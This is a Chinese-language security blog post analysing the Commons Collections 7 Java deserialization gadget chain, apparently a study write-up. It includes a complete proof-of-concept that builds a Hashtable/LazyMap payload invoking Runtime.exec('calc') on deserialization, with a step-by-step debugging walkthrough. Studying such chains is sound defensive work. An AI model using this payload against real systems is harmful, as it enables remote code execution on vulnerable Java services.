Java安全之Commons Collections7分析

0x00 前言

本文讲解的该链是原生ysoserial中的最后一条CC链,但是实际上并不是的。在后来随着后面各位大佬们挖掘利用链,CC8,9,10的链诞生,也被内置到ysoserial里面。在该链中其实和CC6也是类似,但是CC7利用链中是使用Hashtable作为反序列化的入口点。

0x01 POC分析

  1. package com.test;
  2. import org.apache.commons.collections.Transformer;
  3. import org.apache.commons.collections.functors.ChainedTransformer;
  4. import org.apache.commons.collections.functors.ConstantTransformer;
  5. import org.apache.commons.collections.functors.InvokerTransformer;
  6. import org.apache.commons.collections.map.LazyMap;
  7. import java.io.*;
  8. import java.lang.reflect.Field;
  9. import java.util.HashMap;
  10. import java.util.Hashtable;
  11. import java.util.Map;
  12. public class cc7 {
  13. public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
  14. // Reusing transformer chain and LazyMap gadgets from previous payloads
  15. final String[] execArgs = new String[]{"calc"};
  16. final Transformer transformerChain = new ChainedTransformer(new Transformer[]{});
  17. final Transformer[] transformers = new Transformer[]{
  18. new ConstantTransformer(Runtime.class),
  19. new InvokerTransformer("getMethod",
  20. new Class[]{String.class, Class[].class},
  21. new Object[]{"getRuntime", new Class[0]}),
  22. new InvokerTransformer("invoke",
  23. new Class[]{Object.class, Object[].class},
  24. new Object[]{null, new Object[0]}),
  25. new InvokerTransformer("exec",
  26. new Class[]{String.class},
  27. execArgs),
  28. new ConstantTransformer(1)};
  29. Map innerMap1 = new HashMap();
  30. Map innerMap2 = new HashMap();
  31. // Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject
  32. Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
  33. lazyMap1.put("yy", 1);
  34. Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
  35. lazyMap2.put("zZ", 1);
  36. // Use the colliding Maps as keys in Hashtable
  37. Hashtable hashtable = new Hashtable();
  38. hashtable.put(lazyMap1, 1);
  39. hashtable.put(lazyMap2, 2);
  40. Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
  41. iTransformers.setAccessible(true);
  42. iTransformers.set(transformerChain,transformers);
  43. // Reflections.setFieldValue(transformerChain, "iTransformers", transformers);
  44. // Needed to ensure hash collision after previous manipulations
  45. lazyMap2.remove("yy");
  46. ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test1.out"));
  47. objectOutputStream.writeObject(hashtable);
  48. objectOutputStream.close();
  49. ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("test1.out"));
  50. objectInputStream.readObject();
  51. // return hashtable;
  52. }
  53. }

这里依旧是提取重要代码出来去做了一个简化。

抛去和前面重复的部分,下面分为三段代码去进行分析。

  1. Map innerMap1 = new HashMap();
  2. Map innerMap2 = new HashMap();
  3. // Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject
  4. Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
  5. lazyMap1.put("yy", 1);
  6. Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
  7. lazyMap2.put("zZ", 1);
  8. Hashtable hashtable = new Hashtable();
  9. hashtable.put(lazyMap1, 1);
  10. hashtable.put(lazyMap2, 2);

在这段代码中,实例化了两个 HashMap,并对两个 HashMap使用了LazyMaptransformerChain HashMap

绑定到一起。然后分别添加到 Hashtable中, 但是前面看到的都是使用一次,为什么这里需要重复2次重复的操作呢?

下面来分析一下。

HashtablereconstitutionPut方法是被遍历调用的,

第一次调用的时候,并不会走入到reconstitutionPut方法for循环里面,因为tab[index]的内容是空的,在下面会对tab[index]进行赋值。在第二次调用reconstitutionPut时,tab中才有内容,我们才有机会进入到这个for循环中,从而调用equals方法。这也是为什么要调用两次put的原因。

  1. Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
  2. iTransformers.setAccessible(true);
  3. iTransformers.set(transformerChain,transformers);
  4. lazyMap2.remove("yy");

前面的三段代码其实就是为了防止在序列化的时候,本地进行命令执行,前面先定义好一个空的,后面再使用反射将他的iTransformers进行替换。

其实最主要的是后面的lazyMap2.remove这个步骤。至于为什么需要在最后面移除该值,其实在LazyMap的get方法里面就可以看到。

如果不移除该方法就会走不进该判断条件的代码块中。而后面也会再调用一次put方法。

0x02 POC调试

依旧是在readobjetc的复写点打一个断点,这里面用到的是Hashtablereadobjetc作为入口点。

在其中会调用到reconstitutionPut方法,跟进一下。

前面说过,第一遍调用的时候,tab[index]是为空的,需要跟进到第二步的执行里面去查看。

在第二遍执行的时候就会进行到for循环里面,并且调用到keyequals方法。跟进一下该方法。

AbstractMapDecoratorequals方法会去调用this.mapequals。跟进一下。

下面代码还会继续调用m.get方法,在这里的m为LazyMap对象。

在最后就来到了LazyMap.get这一步,其实就比较清晰了。后面的和前面分析的几条链都一样。这里就不做分析了。

0x03 结尾

分析完了这一系列的CC链,后面就打算分析Fastjson、shiro、weblogic等反序列化漏洞,再后面就是开始写反序列化工具集了。

Java安全之Commons Collections7分析的更多相关文章

  1. Ysoserial Commons Collections7分析

    Ysoserial Commons Collections7分析 写在前面 CommonsCollections Gadget Chains CommonsCollection Version JDK ...

  2. Java安全之Commons Collections1分析(二)

    Java安全之Commons Collections1分析(二) 0x00 前言 续上篇文,继续调试cc链.在上篇文章调试的cc链其实并不是一个完整的链.只是使用了几个方法的的互相调用弹出一个计算器. ...

  3. Java安全之Commons Collections1分析(一)

    Java安全之Commons Collections1分析(一) 0x00 前言 在CC链中,其实具体执行过程还是比较复杂的.建议调试前先将一些前置知识的基础给看一遍. Java安全之Commons ...

  4. Java安全之Commons Collections1分析前置知识

    Java安全之Commons Collections1分析前置知识 0x00 前言 Commons Collections的利用链也被称为cc链,在学习反序列化漏洞必不可少的一个部分.Apache C ...

  5. Java安全之Commons Collections1分析(三)

    Java安全之Commons Collections1分析(三) 0x00 前言 继续来分析cc链,用了前面几篇文章来铺垫了一些知识.在上篇文章里,其实是硬看代码,并没有去调试.因为一直找不到JDK的 ...

  6. Java安全之Commons Collections3分析

    Java安全之Commons Collections3分析 文章首发:Java安全之Commons Collections3分析 0x00 前言 在学习完成前面的CC1链和CC2链后,其实再来看CC3 ...

  7. Java安全之Commons Collections2分析

    Java安全之Commons Collections2分析 首发:Java安全之Commons Collections2分析 0x00 前言 前面分析了CC1的利用链,但是发现在CC1的利用链中是有版 ...

  8. Java安全之Commons Collections5分析

    Java安全之Commons Collections5分析 文章首发:Java安全之Commons Collections5分析 0x00 前言 在后面的几条CC链中,如果和前面的链构造都是基本一样的 ...

  9. Java安全之Commons Collections6分析

    Java安全之Commons Collections6分析 0x00 前言 其实在分析的几条链中都大致相同,都是基于前面一些链的变形,在本文的CC6链中,就和前面的有点小小的区别.在CC6链中也和CC ...

随机推荐

  1. 干货满满!关于Pycharm远程开发

    可以在Windows中使用Pycharm编写代码,而代码的调试运行可以使用远程服务器中的python解释器. 在本地创建好工程项目(或从git上clone下代码)后,用Pycharm打开: 打开「To ...

  2. 网络端口及nmap扫描

    端口: 计算机与外界交流的出口,在渗透测试当中常用的端口号: 21号端口FTP:文件传输协议 23号端口Telent :远程登录接口 53号端口 DNS: 域名端口 80号端口HTTP:超文本传输协议 ...

  3. Dominate【操作系统的经典算法】

    此篇文章我们来谈一谈操作系统中都出现过哪些算法,请欣赏下图 ↓ 进程和线程管理中的算法 进程和线程在调度时候出现过很多算法,这些算法的设计背景是当一个计算机是多道程序设计系统时,会频繁的有很多进程或者 ...

  4. 欧拉函数线性求解以及莫比乌斯反演(Mobius)

    前言 咕咕了好久终于来学习莫反了 要不是不让在机房谁会发现数学一本通上有这么神奇的东西 就是没有性质的证明 然后花了两节数学课证明了一遍 舒服- 前置知识:欧拉函数,二项式定理(组合数) 会欧拉函数的 ...

  5. Linux驱动知识点

    # i2c_add_driver和i2c_new_device匹配后调用i2c_probe # 启动开发板,在超级终端中输入命令"cat /proc/misc"也可以查看对应的杂项 ...

  6. C++库文件解析(conio.h)

    转载:https://blog.csdn.net/ykmzy/article/details/51276596 Conio.h 控制台输入输出库该文内容部分参照百度百科 Conio.h 在C stan ...

  7. 搭建Leanote私有云服务器

    安装流程 安装Golang 安装Leanote 安装Mongodb 配置Leanote 初始化Mongodb数据 运行Leanote 安装Golang # 下载go1.14.4.linux-amd64 ...

  8. Python中字符串有哪些常用操作?纯干货超详细

  9. Windows7 组策略错误:“未能打开这台计算机上的组策略对象。您可能没有合适的权限。”

    在 Windows 7 系统下,打开组策略时,出现 组策略错误 -- "未能打开这台计算机上的组策略对象.您可能没有合适的权限.".如下图所示: 解决方案: 1.进入"计 ...

  10. 第十四周C++学习总结

    类模板使用方法:类模板名 <数据类型> 对象名: C++有个标准模板库(STL)(standard template library),编程时使用它会提高程序的可靠性. Stl 包含了(容 ...